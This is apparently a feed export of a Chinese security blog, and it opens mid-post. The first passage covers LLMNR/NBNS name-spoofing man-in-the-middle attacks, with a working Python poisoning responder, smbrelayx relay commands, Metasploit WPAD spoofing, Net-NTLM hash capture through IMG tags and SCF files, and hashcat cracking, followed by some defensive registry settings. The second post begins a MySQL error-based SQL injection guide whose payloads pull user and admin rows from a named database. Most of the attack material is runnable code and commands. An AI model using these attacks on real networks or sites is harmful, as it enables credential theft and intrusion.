class="string">"\x00"</span> <span class="comment"># Answer Name Null</span></div><div class="line"> <span class="string">"\x00\x01"</span> <span class="comment"># Answer Type ,IPv4(0x0001)? or IPv6(0x001c)?</span></div><div class="line"> <span class="string">"\x00\x01"</span> <span class="comment"># Class</span></div><div class="line"> <span class="string">"\x00\x00\x00\x1e"</span> <span class="comment"># TTL Default:30s</span></div><div class="line"> <span class="string">"\x00\x04"</span> <span class="comment"># IP Length</span></div><div class="line"> <span class="string">"IPADDR"</span>) <span class="comment"># IP Address</span></div><div class="line"></div><div class="line"> <span class="function"><span class="keyword">def</span> <span class="title">init_socket</span><span class="params">(self)</span>:</span></div><div class="line"> self.HOST = <span class="string">"192.168.15.165"</span></div><div class="line"> self.PORT = <span class="number">5355</span></div><div class="line"> self.MulADDR = <span class="string">"224.0.0.252"</span></div><div class="line"> self.las.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, <span class="number">1</span>)</div><div class="line"> self.las.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, <span class="number">255</span>)</div><div class="line"> self.las.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP,</div><div class="line"> socket.inet_aton(self.MulADDR) + socket.inet_aton(self.HOST))</div><div class="line"></div><div class="line"> <span class="function"><span class="keyword">def</span> <span class="title">Answser</span><span class="params">(self)</span>:</span></div><div class="line"> self.las.bind((self.HOST, self.PORT))</div><div class="line"> <span class="keyword">print</span> <span class="string">"Listening..."</span></div><div class="line"> <span class="keyword">while</span> <span class="keyword">True</span>:</div><div class="line"> data, addr = self.las.recvfrom(<span class="number">1024</span>)</div><div class="line"></div><div class="line"> tid = data[<span class="number">0</span>:<span class="number">2</span>]</div><div class="line"> namelen = struct.unpack(<span class="string">'>B'</span>, data[<span class="number">12</span>])[<span class="number">0</span>]</div><div class="line"> name = data[<span class="number">13</span>:<span class="number">13</span> + namelen]</div><div class="line"></div><div class="line"> data = self.AnswerData.replace(<span class="string">'TID'</span>, tid)</div><div class="line"> data = data.replace(<span class="string">'LENGTH'</span>, struct.pack(<span class="string">'>B'</span>, namelen))</div><div class="line"> data = data.replace(<span class="string">'NAME'</span>, name)</div><div class="line"> data = data.replace(<span class="string">'IPADDR'</span>, socket.inet_aton(self.IPADDR))</div><div class="line"></div><div class="line"> <span class="keyword">print</span> <span class="string">"Poisoned answer(%s) sent to %s for name %s "</span> % (self.IPADDR, addr[<span class="number">0</span>], name)</div><div class="line"> self.las.sendto(data, addr)</div><div class="line"></div><div class="line"> self.las.setsockopt(socket.IPPROTO_IP, socket.IP_DROP_MEMBERSHIP,</div><div class="line"> socket.inet_aton(self.MulADDR) + socket.inet_aton(self.HOST))</div><div class="line"> self.las.close()</div><div class="line"></div><div class="line"><span class="keyword">if</span> __name__ == <span class="string">"__main__"</span>:</div><div class="line"> llmnr = LLMNR_Answer(<span class="string">"11.22.33.44"</span>)</div><div class="line"> llmnr.Answser()</div></pre></td></tr></table></figure></p><h3 id="Network-Basic-Input-Output-System-NetBIOS"><a href="#Network-Basic-Input-Output-System-NetBIOS" class="headerlink" title="Network Basic Input/Output System (NetBIOS)"></a>Network Basic Input/Output System (NetBIOS)</h3><p>NetBIOS is an API providing various networking services.</p><p>NetBIOS provides three distinct services:</p><ul><li>Name service for name registration and resolution (ports: 137/udp and 137/tcp)</li><li>Datagram distribution service for connectionless communication (port: 138/udp)</li><li>Session service for connection-oriented communication (port: 139/tcp)</li></ul><h4 id="NBNS"><a href="#NBNS" class="headerlink" title="NBNS"></a>NBNS</h4><p>NetBIOS名字服务,将NetBIOS名称解析为相应IP地址。很多时候是启用TCP/IP上的NetBIOS。</p><p><img src="https://i.imgur.com/eA7fXEE.png" alt=""></p><p>当我们PING hostname或者socket.gethostbyname(‘hostname’)时,依次会在本地缓存查找,LMHOSTS,WINS服务器,广播“名称查询”数据包。</p><p><img src="https://i.imgur.com/rjQSub1.png" alt=""></p><h4 id="Nbtstat"><a href="#Nbtstat" class="headerlink" title="Nbtstat"></a>Nbtstat</h4><p>我们可以通过nbtstat命令来查看本地NetBIOS名称缓存。</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div></pre></td><td class="code"><pre><div class="line">NBTSTAT [ [-A IP address] [-c] [-n] [-R]]</div><div class="line"> -A (适配器状态) 列出指定 IP 地址的远程机器的名称表。</div><div class="line"> -c (缓存) 列出远程[计算机]名称及其 IP 地址的 NBT 缓存</div><div class="line"> -n (名称) 列出本地 NetBIOS 名称。</div><div class="line"> -R (重新加载) 清除和重新加载远程缓存名称表</div></pre></td></tr></table></figure><h4 id="SMBRelay"><a href="#SMBRelay" class="headerlink" title="SMBRelay"></a>SMBRelay</h4><p>SMB2<br>Server Message Block (SMB)服务器消息块协议,主要用于在计算机间共享文件、打印机、串口等。SMB2运行在TCP 139和445端口。</p><p>使用NTLMv2身份认证</p><p><img src="https://i.imgur.com/fB6vgaV.png" alt=""></p><ol><li>协商</li><li>挑战</li><li>认证</li></ol><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div></pre></td><td class="code"><pre><div class="line">Client (域中机器) ----> Middle Attack (192.168.6.12) ----> Server(192.168.6.4)</div><div class="line"> !</div><div class="line"> !</div><div class="line"> V</div><div class="line">DC (192.168.6.2)</div></pre></td></tr></table></figure><blockquote><p>Note<br>Windows Server 2008 R2 需关闭“对通信进行数字签名”,否则smbrelayx.py将报错 <strong>SMB SessionError: STATUS_ACCESS_DENIED({Access Denied}…</strong>,我们也可以通过NETLOGON (CVE-2015-0005)获取SMB session key。</p></blockquote><p>注册表禁用签名<br>HKLM\System\CurrentControlSet\Services\LanManServer\Parameters<br>RequireSecuritySignature REG_DWORD: 0 = Disabled</p><p>利用工具:<br>Impacket<br><a href="https://github.com/CoreSecurity/impacket" target="_blank" rel="external">https://github.com/CoreSecurity/impacket</a></p><p>Attack转发SMB请求到Server并执行命令calc.exe</p><p><code>python smbrelayx.py -h 192.168.6.4 -c "calc.exe"</code></p><p>Client以一个有效的账户登录(通常是域管),命令行执行:</p><p><code>dir \\192.168.6.12\c$</code></p><p><img src="https://i.imgur.com/0s7ImOr.png" alt=""></p><h4 id="SMB签名"><a href="#SMB签名" class="headerlink" title="SMB签名"></a>SMB签名</h4><p>你需要一个有效的机器账户名和NTLM hashes,通过-domain参数指定DC。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">WIN-7JFKE9MFQQ7$:RUOS:00000000000000000000000000000000:FB55268036B7C0ACE6E417F2EF959C28</div></pre></td></tr></table></figure></p><p>Usage:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">./smbrelayx.py -h 192.168.6.4 -c "calc.exe" -machine-account RUOS/WIN-7JFKE9MFQQ7\$ -machine-hashes LMHASH:NTHASH -domain DC</div></pre></td></tr></table></figure></p><p><img src="https://i.imgur.com/MQyVCej.png" alt=""></p><h4 id="BadTunnel"><a href="#BadTunnel" class="headerlink" title="BadTunnel"></a>BadTunnel</h4><p>跨网段响应名称查询</p><h3 id="WPAD"><a href="#WPAD" class="headerlink" title="WPAD"></a>WPAD</h3><p>WPAD(Web Proxy Auto Discovery)让浏览器通过DHCP和DNS的查询来搜索PAC文件的位置。</p><p>当IE Internet Options连接中配置为自动检测设置时,IE会根据以下方式来查找WPAD.dat文件</p><ul><li>DHCP(252 option)</li><li>DNS A record query</li><li>NetBios</li><li>LLMNR</li></ul><p>在DNS中创建WPAD (无法解析?)</p><p><a href="https://technet.microsoft.com/en-us/library/cc995062.aspx" target="_blank" rel="external">https://technet.microsoft.com/en-us/library/cc995062.aspx</a></p><p><img src="https://i.imgur.com/FBblcZW.png" alt=""></p><p>Proxy auto-config<br>代理自动配置(PAC)文件定义了应用如何自动选择合适的代理服务器来访问给定的URL,习惯命名proxy.pac,WPAD标准使用wpad.dat。</p><p>A simple example of a PAC file:<br><figure class="highlight js"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div></pre></td><td class="code"><pre><div class="line"><span class="function"><span class="keyword">function</span> <span class="title">FindProxyForURL</span>(<span class="params">url, host</span>) </span>{</div><div class="line"> <span class="keyword">if</span> (url== <span class="string">'http://www.baidu.com/'</span>) <span class="keyword">return</span> <span class="string">'DIRECT'</span>;</div><div class="line"> <span class="keyword">if</span> (host== <span class="string">'twitter.com'</span>) <span class="keyword">return</span> <span class="string">'SOCKS 127.0.0.10:7070'</span>;</div><div class="line"> <span class="keyword">if</span> (dnsResolve(host) == <span class="string">'10.0.0.100'</span>) <span class="keyword">return</span> <span class="string">'PROXY 127.0.0.1:8086;DIRECT'</span>;</div><div class="line"> <span class="keyword">return</span> <span class="string">'DIRECT'</span>;</div><div class="line">}</div></pre></td></tr></table></figure></p><h4 id="如何攻击?"><a href="#如何攻击?" class="headerlink" title="如何攻击?"></a>如何攻击?</h4><p>客户端首先查询WPAD名称IP,然后下载wpad.dat文件配置浏览器代理。</p><p>WPAD服务器<br><a href="http://192.168.6.12/wpad.dat" target="_blank" rel="external">http://192.168.6.12/wpad.dat</a></p><figure class="highlight js"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div></pre></td><td class="code"><pre><div class="line"><span class="function"><span class="keyword">function</span> <span class="title">FindProxyForURL</span>(<span class="params">url, host</span>) </span>{</div><div class="line"> <span class="comment">// URLs within this network are accessed directly</span></div><div class="line"> <span class="keyword">if</span> (isInNet(host, <span class="string">"127.0.0.1"</span>, <span class="string">"255.255.255.0"</span>))</div><div class="line"> {</div><div class="line"> <span class="keyword">return</span> <span class="string">"DIRECT"</span>;</div><div class="line"> }</div><div class="line"><span class="comment">// 192.168.6.1:8080 开启http代理</span></div><div class="line"> <span class="keyword">return</span> <span class="string">"PROXY 192.168.6.1:8080; DIRECT"</span>;</div><div class="line">}</div></pre></td></tr></table></figure><p>MSF NBNS响应攻击<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div></pre></td><td class="code"><pre><div class="line">msf > use auxiliary/spoof/nbns/nbns_response</div><div class="line">msf auxiliary(nbns_response) > set regex WPAD</div><div class="line">msf auxiliary(nbns_response) > set spoofip 192.168.6.12</div><div class="line">msf auxiliary(nbns_response) > run</div></pre></td></tr></table></figure></p><p>当IE访问链接时,通过NBNS查询WPAD,攻击机将响应IP指向192.168.6.12。IE将自动下载wpad.dat文件并将地址缓存到注册表[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]项,此时IE的流量将通过我们的代理服务器。</p><p><img src="https://i.imgur.com/Cah3y8L.png" alt=""></p><h4 id="抓取HASH"><a href="#抓取HASH" class="headerlink" title="抓取HASH"></a>抓取HASH</h4><p>Net-NTLM hashes 被用来作为网络认证,不同于NTLM hashes,不能用来执行 Pass-The-Hash 攻击,Net-NTLMv2 hash格式如下。</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">admin::RUOS:1122334455667788:d5006d468c997ca37845df3d88316477:0101000000000000eaca11bf5f6ed301ca362b9cc58cc07500000000020000000000000000000000</div></pre></td></tr></table></figure><p>启动smb服务</p><p><img src="https://i.imgur.com/ZC6016i.png" alt=""></p><blockquote><p>Note<br>auxiliary/server/capture/http_ntlm 通过http方式访问将弹出Windows安全认证窗口</p></blockquote><p>IMG标签<br><code><img src="\\192.168.6.12\1.jpg" /></code></p><p>test.scf放入共享目录<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div></pre></td><td class="code"><pre><div class="line">[Shell]</div><div class="line">Command=2</div><div class="line">IconFile=\\192.168.6.12\test</div><div class="line">[Taskbar]</div><div class="line">Command=ToggleDesktop</div></pre></td></tr></table></figure></p><p>当用户打开嵌入IMG标签的网页或者访问含有test.scf文件的共享目录时将自动向192.168.6.12请求认证。</p><p><img src="https://i.imgur.com/rYznNPD.png" alt=""></p><h4 id="Crack-hash"><a href="#Crack-hash" class="headerlink" title="Crack hash"></a>Crack hash</h4><ul><li>字典破解(不推荐)<br>hashcat64 -m 5600 -D 1 –show john_hashes_netntlmv2 example.dict</li><li>彩虹表</li></ul><h3 id="自动化攻击工具"><a href="#自动化攻击工具" class="headerlink" title="自动化攻击工具"></a>自动化攻击工具</h3><ul><li><p>Inveigh<br>Inveigh is a PowerShell LLMNR/mDNS/NBNS spoofer and man-in-the-middle tool<br><a href="https://github.com/Kevin-Robertson/Inveigh" target="_blank" rel="external">https://github.com/Kevin-Robertson/Inveigh</a></p></li><li><p>Responder<br>LLMNR/NBT-NS/mDNS Poisoner<br><a href="https://github.com/SpiderLabs/Responder" target="_blank" rel="external">https://github.com/SpiderLabs/Responder</a></p></li><li><p>PS>Attack<br><a href="https://github.com/jaredhaight/PSAttack" target="_blank" rel="external">https://github.com/jaredhaight/PSAttack</a></p></li></ul><h4 id="Responder"><a href="#Responder" class="headerlink" title="Responder"></a>Responder</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">./Responder.py -I eth0 -wrfvb -u 192.168.6.1:8888</div></pre></td></tr></table></figure><p>Responder启动将开启WPAD,SMB,WEB PROXY等服务,并响应所有名字解析到Responder服务器IP。受害者通过Responder代理服务器访问网页将被注入HTML代码 (-b参数),并弹出认证钓鱼页面。当开启Serve-Exe = On参数时将替换客户端下载的所有exe为ExeFilename指定的程序。</p><p>由于会自动响应域名名称,导致显示太多信息,我们修改NBTNS.py将其忽略。</p><figure class="highlight python"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div></pre></td><td class="code"><pre><div class="line"><span class="comment"># NBT_NS Server class.</span></div><div class="line"><span class="class"><span class="keyword">class</span> <span class="title">NBTNS</span><span class="params">(BaseRequestHandler)</span>:</span></div><div class="line"><span class="function"><span class="keyword">def</span> <span class="title">handle</span><span class="params">(self)</span>:</span></div><div class="line">data, socket = self.request</div><div class="line">Name = Decode_Name(data[<span class="number">13</span>:<span class="number">45</span>])</div><div class="line"><span class="keyword">if</span> re.match(<span class="string">r'^([A-Z0-9]+(-[A-Z0-9]+)*\.)+[A-Z]{2,}$'</span>, Name):</div><div class="line"><span class="comment">#print "this is a domain: " + Name</span></div><div class="line"><span class="keyword">return</span> <span class="keyword">None</span></div></pre></td></tr></table></figure><p><img src="https://i.imgur.com/tpHTDCW.png" alt=""></p><h3 id="防范"><a href="#防范" class="headerlink" title="防范"></a>防范</h3><ul><li>禁用LLMNR<br>reg add “HKLM\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient” /v EnableMulticast /t REG_DWORD /d 0 /f<br>reg add “HKLM\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows NT\DNSClient” /v EnableMulticast /t REG_DWORD /d 0 /f</li><li>禁用NetBIOS</li><li>启用SMB签名</li></ul><h3 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h3><ul><li><a href="https://dl.packetstormsecurity.net/1503-exploits/CORE-2015-0005.txt" target="_blank" rel="external">https://dl.packetstormsecurity.net/1503-exploits/CORE-2015-0005.txt</a></li><li><a href="https://pen-testing.sans.org/blog/2013/04/25/smb-relay-demystified-and-ntlmv2-pwnage-with-python" target="_blank" rel="external">https://pen-testing.sans.org/blog/2013/04/25/smb-relay-demystified-and-ntlmv2-pwnage-with-python</a></li><li><a href="https://winprotocoldoc.blob.core.windows.net/productionwindowsarchives/MS-SMB2/[MS-SMB2].pdf" target="_blank" rel="external">https://winprotocoldoc.blob.core.windows.net/productionwindowsarchives/MS-SMB2/[MS-SMB2].pdf</a></li><li><a href="http://www.ubiqx.org/cifs/SMB.html" target="_blank" rel="external">http://www.ubiqx.org/cifs/SMB.html</a></li></ul>]]></content>
<summary type="html">
<h1 id="名称欺骗中间人攻击"><a href="#名称欺骗中间人攻击" class="headerlink" title="名称欺骗中间人攻击"></a>名称欺骗中间人攻击</h1><h3 id="LLMNR"><a href="#LLMNR" class="headerlink" title="LLMNR"></a>LLMNR</h3><p>Link-Local Multicast Name Resolution (LLMNR)<br>链路本地多播名称解析</p>
<p>当我们执行<code>ping WEBTST01</code>将会发送LLMNR请求解析WEBTST01。所有的LLMNR包将会发送到组播地址224.0.0.252 MAC:<code>01:00:5E:00:00:FC</code>,响应主机将单播回应查询。</p>
<p><img src="https://i.imgur.com/o1jbyP5.png" alt=""></p>
<h4 id="LLMNR-packet-header-structure"><a href="#LLMNR-packet-header-structure" class="headerlink" title="LLMNR packet header structure"></a>LLMNR packet header structure</h4><p><img src="https://i.imgur.com/VHUoWeu.png" alt=""></p>
<ul>
<li>ID - A 16-bit identifier assigned by the program that generates any kind of query.</li>
<li>QR - Query/Response.</li>
<li>OPCODE - A 4-bit field that specifies the kind of query in this message. This value is set by the originator of a query and copied * into the response. This specification defines the behavior of standard queries and responses (opcode value of zero). Future specifications may define the use of other opcodes with LLMNR.</li>
<li>C - Conflict.</li>
<li>TC - TrunCation.</li>
<li>T - Tentative.</li>
<li>Z - Reserved for future use.</li>
<li>RCODE - Response code.</li>
<li>QDCOUNT - An unsigned 16-bit integer specifying the number of entries in the question section.</li>
<li>ANCOUNT - An unsigned 16-bit integer specifying the number of resource records in the answer section.</li>
<li>NSCOUNT - An unsigned 16-bit integer specifying the number of name server resource records in the authority records section.</li>
<li>ARCOUNT - An unsigned 16-bit integer specifying the number of resource records in the additional records section.</li>
</ul>
</summary>
</entry>
<entry>
<title>数据库黑客</title>
<link href="http://ruos.org/2017/11/17/%E6%95%B0%E6%8D%AE%E5%BA%93%E9%BB%91%E5%AE%A2/"/>
<id>http://ruos.org/2017/11/17/数据库黑客/</id>
<published>2017-11-17T05:46:15.000Z</published>
<updated>2018-01-19T08:53:43.453Z</updated>
<content type="html"><![CDATA[<h2 id="MYSQL"><a href="#MYSQL" class="headerlink" title="MYSQL"></a>MYSQL</h2><p>MYSQL各个版本下载<br><a href="http://mirrors.sohu.com/mysql/" target="_blank" rel="external">http://mirrors.sohu.com/mysql/</a></p><h3 id="报错注入"><a href="#报错注入" class="headerlink" title="报错注入"></a>报错注入</h3><h4 id="常用报错函数"><a href="#常用报错函数" class="headerlink" title="常用报错函数"></a>常用报错函数</h4><p>FLOOR(X)表示向下取整</p><p>select FLOOR(12.2) -> 12</p><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">select</span> * <span class="keyword">from</span> t <span class="keyword">where</span> <span class="keyword">name</span>=<span class="string">'a'</span> </div><div class="line"><span class="keyword">UNION</span> ALL <span class="keyword">select</span> <span class="keyword">count</span>(*),<span class="keyword">concat</span>(<span class="keyword">user</span>(),<span class="keyword">floor</span>(<span class="keyword">rand</span>(<span class="number">0</span>)*<span class="number">2</span>))x <span class="keyword">from</span> information_schema.tables <span class="keyword">group</span> <span class="keyword">by</span> x</div><div class="line"></div><div class="line">[Err] <span class="number">1062</span> - <span class="keyword">Duplicate</span> entry <span class="string">'root@localhost1'</span> <span class="keyword">for</span> <span class="keyword">key</span> <span class="string">'group_key'</span></div><div class="line"></div><div class="line"><span class="keyword">select</span> * <span class="keyword">from</span> t <span class="keyword">where</span> <span class="keyword">name</span>=<span class="string">'a'</span> </div><div class="line"><span class="keyword">and</span> (<span class="keyword">select</span> <span class="number">1</span> <span class="keyword">from</span> (<span class="keyword">select</span> <span class="keyword">count</span>(*),<span class="keyword">concat</span>(<span class="keyword">version</span>(),<span class="keyword">floor</span>(<span class="keyword">rand</span>(<span class="number">0</span>)*<span class="number">2</span>))x <span class="keyword">from</span> information_schema.tables <span class="keyword">group</span> <span class="keyword">by</span> x)a);</div></pre></td></tr></table></figure><p>XML文档支持</p><p>ExtractValue() 长度32位限制</p><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">select</span> * <span class="keyword">from</span> t <span class="keyword">where</span> <span class="keyword">name</span>=<span class="string">'a'</span> </div><div class="line"><span class="keyword">and</span> (extractvalue(<span class="number">1</span>,<span class="keyword">concat</span>(<span class="number">0x7e</span>,(<span class="keyword">select</span> <span class="keyword">user</span>()),<span class="number">0x7e</span>)));</div></pre></td></tr></table></figure><p>[Err] 1105 - XPATH syntax error: ‘~root@localhost~’</p><p>UpdateXML()</p><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">select</span> * <span class="keyword">from</span> t <span class="keyword">where</span> <span class="keyword">name</span>=<span class="string">'a'</span> </div><div class="line"><span class="keyword">and</span> (updatexml(<span class="number">1</span>,<span class="keyword">concat</span>(<span class="number">0x7e</span>,(<span class="keyword">select</span> <span class="keyword">user</span>()),<span class="number">0x7e</span>),<span class="number">1</span>));</div></pre></td></tr></table></figure><p>[Err] 1105 - XPATH syntax error: ‘~root@localhost~‘</p><a id="more"></a><p>geometrycollection()</p><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">select</span> * <span class="keyword">from</span> t <span class="keyword">where</span> <span class="keyword">name</span>=<span class="string">'a'</span> </div><div class="line"><span class="keyword">and</span> geometrycollection((<span class="keyword">select</span> * <span class="keyword">from</span>(<span class="keyword">select</span> * <span class="keyword">from</span>(<span class="keyword">select</span> <span class="keyword">user</span>())a)b));</div></pre></td></tr></table></figure><p>[Err] 1367 - Illegal non geometric ‘(select <code>b</code>.<code>user()</code> from (select ‘root@localhost’ AS <code>user()</code> from (select user() AS <code>user()</code>) <code>a</code>) <code>b</code>)’ value found during parsing</p><p>multipoint()</p><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">select</span> * <span class="keyword">from</span> t <span class="keyword">where</span> <span class="keyword">name</span>=<span class="string">'a'</span> </div><div class="line"><span class="keyword">and</span> multipoint((<span class="keyword">select</span> * <span class="keyword">from</span>(<span class="keyword">select</span> * <span class="keyword">from</span>(<span class="keyword">select</span> <span class="keyword">user</span>())a)b));</div></pre></td></tr></table></figure><p>[Err] 1367 - Illegal non geometric ‘(select <code>b</code>.<code>user()</code> from (select ‘root@localhost’ AS <code>user()</code> from (select user() AS <code>user()</code>) <code>a</code>) <code>b</code>)’ value found during parsing</p><p>polygon()</p><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">select</span> * <span class="keyword">from</span> t <span class="keyword">where</span> <span class="keyword">name</span>=<span class="string">'a'</span> </div><div class="line"><span class="keyword">and</span> polygon((<span class="keyword">select</span> * <span class="keyword">from</span>(<span class="keyword">select</span> * <span class="keyword">from</span>(<span class="keyword">select</span> <span class="keyword">user</span>())a)b));</div></pre></td></tr></table></figure><p>[Err] 1367 - Illegal non geometric ‘(select <code>b</code>.<code>user()</code> from (select ‘root@localhost’ AS <code>user()</code> from (select user() AS <code>user()</code>) <code>a</code>) <code>b</code>)’ value found during parsing</p><p>multipolygon()</p><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">select</span> * <span class="keyword">from</span> t <span class="keyword">where</span> <span class="keyword">name</span>=<span class="string">'a'</span> </div><div class="line"><span class="keyword">and</span> multipolygon((<span class="keyword">select</span> * <span class="keyword">from</span>(<span class="keyword">select</span> * <span class="keyword">from</span>(<span class="keyword">select</span> <span class="keyword">user</span>())a)b));</div></pre></td></tr></table></figure><p>[Err] 1367 - Illegal non geometric ‘(select <code>b</code>.<code>user()</code> from (select ‘root@localhost’ AS <code>user()</code> from (select user() AS <code>user()</code>) <code>a</code>) <code>b</code>)’ value found during parsing</p><p>linestring()</p><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">select</span> * <span class="keyword">from</span> t <span class="keyword">where</span> <span class="keyword">name</span>=<span class="string">'a'</span> </div><div class="line"><span class="keyword">and</span> linestring((<span class="keyword">select</span> * <span class="keyword">from</span>(<span class="keyword">select</span> * <span class="keyword">from</span>(<span class="keyword">select</span> <span class="keyword">user</span>())a)b));</div></pre></td></tr></table></figure><p>[Err] 1367 - Illegal non geometric ‘(select <code>b</code>.<code>user()</code> from (select ‘root@localhost’ AS <code>user()</code> from (select user() AS <code>user()</code>) <code>a</code>) <code>b</code>)’ value found during parsing</p><p>multilinestring()</p><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">select</span> * <span class="keyword">from</span> t <span class="keyword">where</span> <span class="keyword">name</span>=<span class="string">'a'</span> </div><div class="line"><span class="keyword">and</span> multilinestring((<span class="keyword">select</span> * <span class="keyword">from</span>(<span class="keyword">select</span> * <span class="keyword">from</span>(<span class="keyword">select</span> <span class="keyword">user</span>())a)b));</div></pre></td></tr></table></figure><p>[Err] 1367 - Illegal non geometric ‘(select <code>b</code>.<code>user()</code> from (select ‘root@localhost’ AS <code>user()</code> from (select user() AS <code>user()</code>) <code>a</code>) <code>b</code>)’ value found during parsing</p><p>exp() 版本在5.5.5以上</p><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">select</span> * <span class="keyword">from</span> <span class="keyword">test</span> <span class="keyword">where</span> <span class="keyword">id</span>=<span class="number">1</span> <span class="keyword">and</span> <span class="keyword">exp</span>(~(<span class="keyword">select</span> * <span class="keyword">from</span>(<span class="keyword">select</span> <span class="keyword">user</span>())a));</div></pre></td></tr></table></figure><h3 id="实例"><a href="#实例" class="headerlink" title="实例"></a>实例</h3><p>error-based<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div></pre></td><td class="code"><pre><div class="line">lang=en') AND EXTRACTVALUE(1267,CONCAT(0x5c,0x7170627871,(<span class="keyword">SELECT</span> (<span class="keyword">CASE</span> <span class="keyword">WHEN</span> (<span class="number">1267</span>=<span class="number">1267</span>) <span class="keyword">THEN</span> <span class="number">1</span> <span class="keyword">ELSE</span> <span class="number">0</span> <span class="keyword">END</span>)),<span class="number">0x7170707671</span>)) <span class="keyword">AND</span> (<span class="string">'PeJH'</span>=<span class="string">'PeJH</span></div><div class="line"><span class="string">name=b'</span> <span class="keyword">and</span> extractvalue(<span class="number">1</span>, <span class="keyword">concat</span>(<span class="number">0x7e</span>,(<span class="keyword">SELECT</span> <span class="keyword">string</span> <span class="keyword">FROM</span> t <span class="keyword">limit</span> <span class="number">0</span>,<span class="number">1</span>))) <span class="keyword">and</span> a =<span class="string">'1</span></div><div class="line"><span class="string">select * from t where name = '</span>c<span class="string">' and extractvalue(1, concat(0x7e,(SELECT string FROM t limit 1,1)) )</span></div><div class="line"><span class="string">select * from t where name = '</span>c<span class="string">' and extractvalue(1, (SELECT string FROM t limit 1,1) )</span></div><div class="line"><span class="string">lang=en'</span>) <span class="keyword">AND</span> EXTRACTVALUE(<span class="number">2872</span>,<span class="keyword">CONCAT</span>(<span class="number">0x23</span>,(<span class="keyword">SELECT</span> <span class="keyword">MID</span>((<span class="keyword">IFNULL</span>(<span class="keyword">CAST</span>(<span class="keyword">id</span> <span class="keyword">AS</span> <span class="built_in">CHAR</span>),<span class="number">0x20</span>)),<span class="number">1</span>,<span class="number">50</span>) <span class="keyword">FROM</span> MTN2012.<span class="string">`user`</span> <span class="keyword">LIMIT</span> <span class="number">7</span>,<span class="number">1</span>))) <span class="keyword">AND</span> (<span class="string">'XTGg'</span>=<span class="string">'XTGg</span></div><div class="line"><span class="string">en'</span>) <span class="keyword">AND</span> EXTRACTVALUE(<span class="number">2872</span>,<span class="keyword">CONCAT</span>(<span class="number">0x23</span>,(<span class="keyword">SELECT</span> <span class="keyword">MID</span>((<span class="keyword">IFNULL</span>(<span class="keyword">CAST</span>(<span class="keyword">id</span> <span class="keyword">AS</span> <span class="built_in">CHAR</span>),<span class="number">0x20</span>)),<span class="number">1</span>,<span class="number">200</span>) <span class="keyword">FROM</span> MTN2012.<span class="string">`user`</span> <span class="keyword">where</span> username=<span class="string">'mihmd'</span> ))) <span class="keyword">and</span> (<span class="number">1</span>=<span class="string">'1;</span></div><div class="line"><span class="string">en'</span>) <span class="keyword">AND</span> EXTRACTVALUE(<span class="number">4230</span>,<span class="keyword">CONCAT</span>(<span class="number">0x5c</span>,<span class="number">0x716b787871</span>,(<span class="keyword">SELECT</span> <span class="keyword">MID</span>((<span class="keyword">IFNULL</span>(<span class="keyword">CAST</span>(cIpAddress <span class="keyword">AS</span> <span class="built_in">CHAR</span>),<span class="number">0x20</span>)),<span class="number">1</span>,<span class="number">50</span>) <span class="keyword">FROM</span> MTN2012.admin <span class="keyword">ORDER</span> <span class="keyword">BY</span> email <span 